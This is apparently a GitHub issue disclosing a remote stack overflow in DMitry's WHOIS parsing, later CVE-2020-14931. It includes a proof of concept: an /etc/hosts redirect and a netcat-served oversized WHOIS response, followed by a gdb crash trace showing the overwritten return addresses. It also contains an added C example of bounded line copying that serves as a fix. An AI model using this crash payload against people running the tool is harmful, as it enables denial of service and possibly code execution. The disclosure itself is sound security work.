jaygreig86 / dmitry

DMitry (Deepmagic Information Gathering Tool)
http://www.mor-pah.net
GNU General Public License v2.0

Remote Stack Overflow (possible RCE) #4

Closed carter-yagemann closed 4 years ago

carter-yagemann commented 4 years ago

Continuing my analysis, this software is also vulnerable to stack overflows triggered by responses from WHOIS servers, which is dangerous since these connections are unencrypted TCP.

This is distinctly different from CVE-2017-7938 because the attack vector is a remote adversary (not local), either controlling the WHOIS server or intercepting the victim's unencrypted network traffic. It also exploits a different part of the code.

PoC:

For simplicity, I'm going to redirect DMitry's WHOIS query by modifying my local /etc/hosts:

127.0.0.1       Af.whois-servers.net

Next, I use nc to act as the WHOIS server:

echo -e "Domain Name: foo\nDomain Status: bar\nAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" | sudo nc -q 5 -l -p 43

While that's running, let's see what happens in DMitry:

$ gdb ./dmitry 
[...]
(gdb) r -w EAf
Starting program: [...]/dmitry -w EAf
Deepmagic Information Gathering Tool
"There be some deep magic going on"

ERROR: Unable to locate Host IP addr. for EAf
Continuing with limited modules
HostIP:
HostName:EAf

Gathered Inic-whois information for EAf
---------------------------------
Domain Name: foo
Domain Status: bar
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�����AAA�UUUUAAAAAAAAAA`�UUUUAAAAAAAAAA�}UUUUAAAAAAAAAA@����AADomain Name: foo
Domain Status: bar
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�����AAA�UUUUAAAAAAAAAA`�UUUUAAAAAAAAAA�}UUUUAAAAAAAAAA@����AADomain Name: foo
Domain Status: bar
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAa
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaAAaA����Aa@����A����Aa@����A����Aa@�H������BUUUU�Af.whois-servers.netA�������Aa@�����������H�����B�hUUUUUEAfUUU�Af.whois-servers.netA�������Aa@�����������H�����B�hUUUUUEAfUUU�Af.whois-servers.netA�������Aa@�����������H�---------------------------------
�����B�hUUUUUEAfUUU�Af.whois-servers.netA�������Aa@�����������H�----------------------�����---------8����--�fUUUU

Program received signal SIGSEGV, Segmentation fault.
0x0000555555557c8c in nic_format_buff (buff=<optimized out>, listn=0) at src/nwhois.c:141
141     if ( strlen(frmtdbuff) ) linetodo = 1;
(gdb) bt
#0  0x0000555555557c8c in nic_format_buff (buff=<optimized out>, listn=0) at src/nwhois.c:141
#1  0x4141555555557dfc in ?? ()
#2  0x4141414141414141 in ?? ()
#3  0x41417fffffffe240 in ?? ()
#4  0x4e206e69616d6f44 in ?? ()
#5  0x6f6f66203a656d61 in ?? ()
#6  0x206e69616d6f440a in ?? ()
#7  0x203a737574617453 in ?? ()
#8  0x414141410a726162 in ?? ()
#9  0x4141414141414141 in ?? ()
#10 0x4141414141414141 in ?? ()
#11 0x4141414141414141 in ?? ()
#12 0x4141414141414141 in ?? ()
#13 0x4141414141414141 in ?? ()
#14 0x4141414141414141 in ?? ()
[...]

Here we obliterated the stack, but a more carefully crafted response may be able to achieve code execution.
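The report above describes a stack overflow triggered by an over-long line in a WHOIS response, which is the classic failure mode of copying untrusted network data into a fixed-size stack buffer. As an added example (written for this page, not DMitry's own code), here is the shape of a bounded per-line handler that processes a raw response into a fixed buffer while refusing to write past its end. The names `format_whois_response`, `copy_line_bounded`, `build_sample_response` and the 256-byte line limit are assumptions chosen for the illustration; the sample response is constructed inline.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Assumed per-line buffer size for the example; not a value from DMitry. */
#define LINE_MAX_LEN 256

/* Copy at most n bytes of src into dst (capacity dstsz), always NUL-terminating.
 * Returns 1 if the line had to be truncated, 0 otherwise. This is the bound
 * that an unchecked strcpy/strcat into a stack buffer lacks. */
static int copy_line_bounded(char *dst, size_t dstsz, const char *src, size_t n)
{
    int truncated = 0;
    if (n >= dstsz) {          /* leave room for the terminator */
        n = dstsz - 1;
        truncated = 1;
    }
    memcpy(dst, src, n);
    dst[n] = '\0';
    return truncated;
}

/* Walk a raw, untrusted response buffer of resplen bytes line by line,
 * formatting each line through a fixed stack buffer.
 * Returns the number of lines handled; *truncated_out receives the number
 * of lines that exceeded LINE_MAX_LEN - 1 bytes and were cut short. */
int format_whois_response(const char *resp, size_t resplen, int *truncated_out)
{
    char line[LINE_MAX_LEN];   /* fixed stack buffer, never written beyond */
    int lines = 0, truncated = 0;
    size_t start = 0;

    for (size_t i = 0; i <= resplen; i++) {
        if (i == resplen || resp[i] == '\n') {
            size_t len = i - start;
            if (i == resplen && len == 0)
                break;         /* buffer ended on a newline: no partial line */
            truncated += copy_line_bounded(line, sizeof line, resp + start, len);
            printf("%s\n", line);   /* per-line formatting/output stage */
            lines++;
            start = i + 1;
        }
    }
    if (truncated_out)
        *truncated_out = truncated;
    return lines;
}

/* Constructed sample: two ordinary WHOIS lines followed by one 400-byte line
 * with no trailing newline. Returns the number of bytes written, 0 if bufsz
 * is too small. */
size_t build_sample_response(char *buf, size_t bufsz)
{
    const char *head = "Domain Name: foo\nDomain Status: bar\n";
    size_t hl = strlen(head);
    if (bufsz < hl + 400 + 1)
        return 0;
    memcpy(buf, head, hl);
    memset(buf + hl, 'A', 400);
    buf[hl + 400] = '\0';
    return hl + 400;
}

/* Run the bounded handler over the constructed sample and report results. */
int demo_line_count(void)
{
    char buf[1024];
    int trunc = 0;
    size_t n = build_sample_response(buf, sizeof buf);
    return format_whois_response(buf, n, &trunc);
}

int demo_truncated_count(void)
{
    char buf[1024];
    int trunc = 0;
    size_t n = build_sample_response(buf, sizeof buf);
    format_whois_response(buf, n, &trunc);
    return trunc;
}

int main(void)
{
    printf("lines=%d truncated=%d\n", demo_line_count(), demo_truncated_count());
    return 0;
}
```

The point of the example is that the buffer size, not the response, decides how many bytes are written: an over-long line is cut at 255 bytes and counted as truncated rather than spilling over the saved return address. Truncation should be surfaced to the user (here via the counter) so that a silently shortened record is not mistaken for a complete one.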

carter-yagemann commented 4 years ago

This vulnerability has been assigned CVE-2020-14931.